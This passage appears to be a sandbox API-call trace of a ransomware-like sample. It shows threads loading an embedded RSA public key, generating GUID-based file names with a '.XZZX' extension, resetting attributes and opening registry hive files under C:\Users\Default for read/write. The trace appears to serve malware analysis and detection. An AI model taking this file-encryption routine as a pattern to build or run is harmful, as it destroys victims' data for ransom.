cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0257.596] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\78A093EF147E49D09FBE2BC717392E18.XZZX") returned 58 [0257.597] StrStrW (lpFirst="NTUSER.DAT", lpSrch="XZZX") returned 0x0 [0257.597] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT", dwFileAttributes=0x20) returned 0 [0257.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1060 os_tid = 0x13a0 [0257.749] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.749] lstrcpyW (in: lpString1=0x2baf460, lpString2="NTUSER.DAT.LOG" | out: lpString1="NTUSER.DAT.LOG") returned="NTUSER.DAT.LOG" [0257.749] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0257.749] SetErrorMode (uMode=0x1) returned 0x1 [0257.749] lstrcpyW (in: lpString1=0x2baf860, lpString2="NTUSER.DAT.LOG" | out: lpString1="NTUSER.DAT.LOG") returned="NTUSER.DAT.LOG" [0257.749] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xf108fe90, Data2=0xc033, Data3=0x45f1, Data4=([0]=0x9f, [1]=0xb6, [2]=0x9c, [3]=0x22, [4]=0xe5, [5]=0xe8, [6]=0xf8, [7]=0xc))) returned 0x0 [0257.749] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0257.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0257.750] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\C3B6B6B03482AF03F108FE90373D934B.XZZX") returned 58 [0257.750] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="XZZX") returned 0x0 [0257.750] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG", dwFileAttributes=0x20) returned 0 [0257.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1061 os_tid = 0x13a4 [0257.905] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.905] lstrcpyW (in: lpString1=0x2baf460, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0257.905] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0257.905] SetErrorMode (uMode=0x1) returned 0x1 [0257.905] lstrcpyW (in: lpString1=0x2baf860, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0257.905] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x438bc0ca, Data2=0x6aed, Data3=0x4a83, Data4=([0]=0xab, [1]=0x65, [2]=0x30, [3]=0x1, [4]=0x22, [5]=0x6, [6]=0x4f, [7]=0x39))) returned 0x0 [0257.905] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0257.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0257.906] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\66351F021F1F3947438BC0CA21DA1D8F.XZZX") returned 58 [0257.906] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="XZZX") returned 0x0 [0257.906] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1", dwFileAttributes=0x20) returned 0 [0257.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1062 os_tid = 0x13a8 [0258.065] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.065] lstrcpyW (in: lpString1=0x2baf460, lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0258.065] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0258.065] SetErrorMode (uMode=0x1) returned 0x1 [0258.065] lstrcpyW (in: lpString1=0x2baf860, lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0258.065] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x658f4fa, Data2=0xf678, Data3=0x4069, Data4=([0]=0xba, [1]=0x7b, [2]=0x9b, [3]=0x52, [4]=0xd9, [5]=0xb1, [6]=0x13, [7]=0xd4))) returned 0x0 [0258.065] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0258.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0258.065] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\751B11303E0317380658F4FA40BDFB80.XZZX") returned 58 [0258.065] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="XZZX") returned 0x0 [0258.065] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2", dwFileAttributes=0x20) returned 0 [0258.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1063 os_tid = 0x13ac [0258.217] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.217] lstrcpyW (in: lpString1=0x2baf460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0258.217] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0258.217] SetErrorMode (uMode=0x1) returned 0x1 [0258.217] lstrcpyW (in: lpString1=0x2baf860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0258.217] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x7cd83fde, Data2=0x38d1, Data3=0x4c68, Data4=([0]=0xb7, [1]=0xd9, [2]=0xbb, [3]=0x6b, [4]=0xfc, [5]=0x9b, [6]=0x9e, [7]=0x2c))) returned 0x0 [0258.217] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0258.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0258.218] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\3A84B43E10F520E87CD83FDE13B00530.XZZX") returned 58 [0258.218] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="XZZX") returned 0x0 [0258.218] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x20) returned 0 [0258.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1064 os_tid = 0x13b0 [0258.373] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.373] lstrcpyW (in: lpString1=0x2baf460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0258.373] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0258.373] SetErrorMode (uMode=0x1) returned 0x1 [0258.373] lstrcpyW (in: lpString1=0x2baf860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0258.373] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x9d4c54d9, Data2=0xc0fd, Data3=0x4239, Data4=([0]=0xa8, [1]=0x34, [2]=0x3d, [3]=0x39, [4]=0x78, [5]=0x50, [6]=0x45, [7]=0x87))) returned 0x0 [0258.373] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0258.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0258.374] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\B4129A7531EC32559D4C54D934A7169D.XZZX") returned 58 [0258.374] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="XZZX") returned 0x0 [0258.374] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x20) returned 0 [0258.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1065 os_tid = 0x13b4 [0258.530] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.530] lstrcpyW (in: lpString1=0x2baf460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0258.530] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0258.530] SetErrorMode (uMode=0x1) returned 0x1 [0258.530] lstrcpyW (in: lpString1=0x2baf860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0258.530] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xebe7085d, Data2=0x2d9a, Data3=0x4548, Data4=([0]=0x82, [1]=0x59, [2]=0x10, [3]=0xe8, [4]=0xcc, [5]=0xd2, [6]=0x5b, [7]=0x8b))) returned 0x0 [0258.530] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0258.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0258.530] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\857360F20C575550EBE7085D0F123998.XZZX") returned 58 [0258.530] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="XZZX") returned 0x0 [0258.530] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x20) returned 0 [0258.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1066 os_tid = 0x13b8 [0258.685] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.685] lstrcpyW (in: lpString1=0x2baf460, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0258.685] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0258.685] SetErrorMode (uMode=0x1) returned 0x1 [0258.685] lstrcpyW (in: lpString1=0x2baf860, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0258.686] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xbe554906, Data2=0x7f18, Data3=0x4873, Data4=([0]=0xa9, [1]=0xd8, [2]=0x21, [3]=0x3e, [4]=0x48, [5]=0xfd, [6]=0xc5, [7]=0x3f))) returned 0x0 [0258.686] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0258.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0258.686] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\2738D29023F7D7C8BE55490626B2BC10.XZZX") returned 58 [0258.686] StrStrW (lpFirst="ntuser.ini", lpSrch="XZZX") returned 0x0 [0258.686] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini", dwFileAttributes=0x20) returned 0 [0258.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1067 os_tid = 0x13bc [0258.846] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- 